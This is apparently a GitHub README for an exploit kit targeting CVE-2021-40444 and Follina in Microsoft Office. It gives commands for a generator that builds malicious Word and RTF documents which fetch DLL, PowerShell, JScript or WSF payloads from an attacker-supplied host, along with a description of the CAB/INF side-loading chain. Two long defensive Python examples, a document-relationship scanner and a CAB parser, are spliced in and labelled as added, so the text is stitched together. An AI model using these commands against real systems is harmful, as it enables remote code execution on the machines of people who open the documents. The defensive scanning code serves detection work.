## https://sploitus.com/exploit?id=57E4A0BC-33C1-5EBF-919F-D7AD7FC586A7
# Exploiting Follina CVE and CVE-2021-40444 Vulnerabilities
## Table of Contents
1. [Introduction](#introduction)
2. [Prerequisites](#prerequisites)
3. [Setup and Installation](#setup-and-installation)
4. [Usage](#usage)
5. [Detailed Explanation](#detailed-explanation)
6. [Commands](#commands)
7. [Disclaimer](#disclaimer)
## Introduction
This repository contains scripts and resources for exploiting the Follina CVE and CVE-2021-40444 vulnerabilities in Microsoft Office. The scripts generate malicious document files that can execute arbitrary code on the target system.
## Prerequisites
- Flare VM
- Python 3.x
- Microsoft Word
- Required Python packages (listed in `requirements.txt`)
## Setup and Installation
1. **Flare VM Setup:**
   - Ensure you have Flare VM installed. The credentials for the VM are:
     - Username: `lab`
     - Password: `password`
2. **Python and Virtual Environment:**
   - Clone the repository and change into the project directory:
     ```bash
     git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
     cd CVE-2021-40444
     ```
   - Make sure Python and pip are installed in the virtual machine.
   - Install the `virtualenv` package using the following command:
     ```bash
     pip install virtualenv
     ```
   - Create a virtual environment named `venv`:
     ```bash
     python -m virtualenv venv
     ```
   - Activate the virtual environment:
     ```bash
     venv\Scripts\activate.bat
     ```
   - Install the required packages:
     ```bash
     pip install -r requirements.txt
     ```
## Usage
1. **Generating the Exploit:**
   - Navigate to the project directory and run the following command to generate the exploit:
     ```bash
     python generator.py -u http://192.168.197.132 -P test\calc.dll --host
     ```
   - Replace `192.168.197.132` with your IP address.
2. **Accessing the Generated Document:**
   - The generated `.docx` file will be located in the directory:
     ```
     C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
     ```
## Detailed Explanation
### Chain Exploitation
- The document (`.docx`) is opened.
- The document contains a relationship in `document.xml.rels` pointing to malicious HTML.
- The HTML link opens in the IE preview.
- In that HTML, an object element points to a CAB file and an iframe points to an INF file; both references are embedded in JScript and prefixed with the `.cpl:` directive.
- The CAB file is opened, saving the INF file in the `%TEMP%\Low` directory.
- The INF file is opened via the `.cpl:` directive, causing `rundll32` to side-load it.
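The first stage of this chain lives entirely in the package's relationship parts, which is what a defender can inspect without rendering the document. The following is an added example (not code from this repository) of a Python scanner that walks every `.rels` part of an Office Open XML package and reports relationships that point outside the package (`TargetMode="External"`) or whose target carries the `mhtml:`, `ms-msdt:` or `.cpl:` indicators discussed above; the indicator list, the `placeholder.invalid` host and the two constructed sample documents are assumptions of this example.

```python
from __future__ import annotations

import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# Indicator patterns (assumed for this example): remote/MHTML targets, the MSDT
# protocol handler used by Follina, and the ".cpl:" directive named in the chain above.
SUSPICIOUS_TARGET = re.compile(r"^(mhtml:|ms-msdt:|https?://|\\\\)|\.cpl:", re.IGNORECASE)


def scan_docx(data: bytes) -> list[dict]:
    """Return one finding per relationship that leaves the package or matches an indicator."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for part in (n for n in z.namelist() if n.endswith(".rels")):
            root = ET.fromstring(z.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                mode = rel.get("TargetMode", "Internal")
                if mode == "External" or SUSPICIOUS_TARGET.search(target):
                    findings.append({
                        "part": part,
                        "id": rel.get("Id"),
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": target,
                        "mode": mode,
                        # oleObject relationships with an external target are the
                        # shape both CVE-2021-40444 and Follina documents used.
                        "ole": rel.get("Type") == OLE_REL_TYPE,
                    })
    return findings


def build_sample_docx(rels_xml: str) -> bytes:
    """Constructed minimal .docx containing only the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample relationship parts: one ordinary document, one with an
# external oleObject relationship using an MHTML target on a placeholder host.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
</Relationships>"""

SUSPECT_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OLE_REL_TYPE}" Target="mhtml:http://placeholder.invalid/document.html" TargetMode="External"/>
</Relationships>"""


if __name__ == "__main__":
    # Usage: python scan_docx_rels.py <file.docx>; with no argument, scan the constructed samples.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            samples = {sys.argv[1]: fh.read()}
    else:
        samples = {"benign": build_sample_docx(BENIGN_RELS), "suspect": build_sample_docx(SUSPECT_RELS)}
    for label, blob in samples.items():
        for f in scan_docx(blob):
            print(f"{label}: {f['part']} {f['id']} type={f['type']} mode={f['mode']} ole={f['ole']} -> {f['target']}")
```

The scan deliberately reports on the relationship part rather than on `document.xml`, because the external target is what Word follows regardless of how the object is described in the body; a mail gateway or EDR rule keyed on `TargetMode="External"` together with an oleObject type catches both variants with the same check.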
### Scripts Overview
#### `generator.py`
- Implements an exploit for CVE-2021-40444, allowing remote code execution via Microsoft Office.
- Contains various helper functions for patching CAB files, creating RAR files, generating payloads, and more.
#### `cab_parser.py`
- A tool for viewing CAB file headers.
- Defines classes and methods for handling and parsing CAB files.
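For readers who want to see what "viewing CAB file headers" involves, here is an added example (not the repository's `cab_parser.py`) of a Python parser for the fixed-size CFHEADER, the CFFOLDER entries and the CFFILE directory of a cabinet, following the structure layout of the Microsoft Cabinet format. It also applies a forensic check a defender would run on a cabinet delivered through a document: flag file names that carry path traversal sequences or that name an INF/CPL, since the chain above depends on an INF landing outside the cabinet's extraction directory. The sample cabinet is constructed inline (header, one uncompressed folder and file entries only, no CFDATA blocks) and its file names are assumptions.

```python
import struct
from typing import Any, Dict, List

CFHEADER_FMT = "<4sIIIIIBBHHHHH"  # signature, reserved1, cbCabinet, reserved2, coffFiles,
                                  # reserved3, versionMinor, versionMajor, cFolders, cFiles,
                                  # flags, setID, iCabinet (36 bytes)
CFFOLDER_FMT = "<IHH"             # coffCabStart, cCFData, typeCompress
CFFILE_FMT = "<IIHHHH"            # cbFile, uoffFolderStart, iFolder, date, time, attribs
CFHDR_RESERVE_PRESENT = 0x0004    # flags bit: per-header/folder/data reserve areas follow
ATTR_NAME_IS_UTF = 0x80           # CFFILE attribs bit: szName is UTF-8


def parse_cab(data: bytes) -> Dict[str, Any]:
    """Parse header, folder table and file directory of a cabinet (no decompression)."""
    if len(data) < struct.calcsize(CFHEADER_FMT) or data[:4] != b"MSCF":
        raise ValueError("not a cabinet: missing MSCF signature or truncated header")
    (_sig, _r1, cb_cabinet, _r2, coff_files, _r3, ver_minor, ver_major,
     c_folders, c_files, flags, set_id, i_cabinet) = struct.unpack_from(CFHEADER_FMT, data, 0)
    off = struct.calcsize(CFHEADER_FMT)
    folder_reserve = 0
    if flags & CFHDR_RESERVE_PRESENT:
        cb_header, cb_folder, _cb_data = struct.unpack_from("<HBB", data, off)
        off += 4 + cb_header
        folder_reserve = cb_folder
    folders = []
    for _ in range(c_folders):
        coff, c_cfdata, type_compress = struct.unpack_from(CFFOLDER_FMT, data, off)
        off += struct.calcsize(CFFOLDER_FMT) + folder_reserve
        folders.append({"coffCabStart": coff, "cCFData": c_cfdata,
                        "typeCompress": type_compress & 0x000F})
    files = []
    off = coff_files
    for _ in range(c_files):
        cb_file, uoff, i_folder, _date, _time, attribs = struct.unpack_from(CFFILE_FMT, data, off)
        off += struct.calcsize(CFFILE_FMT)
        end = data.index(b"\x00", off)  # szName is NUL-terminated
        name = data[off:end].decode("utf-8" if attribs & ATTR_NAME_IS_UTF else "latin-1", "replace")
        off = end + 1
        files.append({"name": name, "cbFile": cb_file, "uoffFolderStart": uoff,
                      "iFolder": i_folder, "attribs": attribs})
    return {
        "cbCabinet": cb_cabinet,
        "version": f"{ver_major}.{ver_minor}",
        "flags": flags,
        "setID": set_id,
        "iCabinet": i_cabinet,
        "folders": folders,
        "files": files,
        # A declared size that disagrees with the actual length is worth noting on its own.
        "sizeMismatch": cb_cabinet != len(data),
    }


def suspicious_files(cab: Dict[str, Any]) -> List[str]:
    """Names a cabinet delivered via a document should not carry: traversal, absolute paths, INF/CPL."""
    out = []
    for f in cab["files"]:
        n = f["name"]
        if ".." in n or n.startswith(("/", "\\")) or n.lower().endswith((".inf", ".cpl")):
            out.append(n)
    return out


def build_sample_cab(names: List[str]) -> bytes:
    """Constructed minimal cabinet: header, one uncompressed folder, CFFILE entries, no CFDATA."""
    entries = b"".join(
        struct.pack(CFFILE_FMT, 0, 0, 0, 0, 0, 0x20) + n.encode("latin-1") + b"\x00" for n in names
    )
    coff_files = struct.calcsize(CFHEADER_FMT) + struct.calcsize(CFFOLDER_FMT)
    total = coff_files + len(entries)
    header = struct.pack(CFHEADER_FMT, b"MSCF", 0, total, 0, coff_files, 0,
                         3, 1, 1, len(names), 0, 0x1234, 0)
    folder = struct.pack(CFFOLDER_FMT, total, 0, 0)  # typeCompress 0 = none
    return header + folder + entries


if __name__ == "__main__":
    # Assumed sample names: one ordinary file and one traversal-style INF entry.
    cab = parse_cab(build_sample_cab(["readme.txt", "../side-load.inf"]))
    print(f"cabinet v{cab['version']} setID=0x{cab['setID']:04x} folders={len(cab['folders'])}")
    for f in cab["files"]:
        print(f"  {f['name']!r:24} size={f['cbFile']} folder={f['iFolder']} attribs=0x{f['attribs']:02x}")
    print("suspicious:", suspicious_files(cab))
```

The parser stops at the directory level on purpose: for triage, the names, the declared sizes and the header flags are usually enough to decide whether a cabinet attached to a document deserves a closer look, and nothing here needs the CFDATA blocks to be inflated.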
### Section 2.0: Setup in Flare VM
- Install necessary tools and packages.
- Create and activate a virtual environment.
- Install Python packages from `requirements.txt`.
## Commands
- Generate the original exploit and test locally:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.dll --host
  ```
- Generate CABless exploit leveraging MS-MSDT (Follina attack), in both DOCX and RTF docs:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
  ```
- Generate CABless exploit (IE-only) with HTML smuggling and test locally via IE:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
  ```
- Generate CABless exploit with RAR and test locally via IE:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
  ```
## Disclaimer
This project is for educational purposes only. Use it responsibly and do not exploit vulnerabilities on systems you do not have permission to test. Misuse of this information can lead to criminal charges.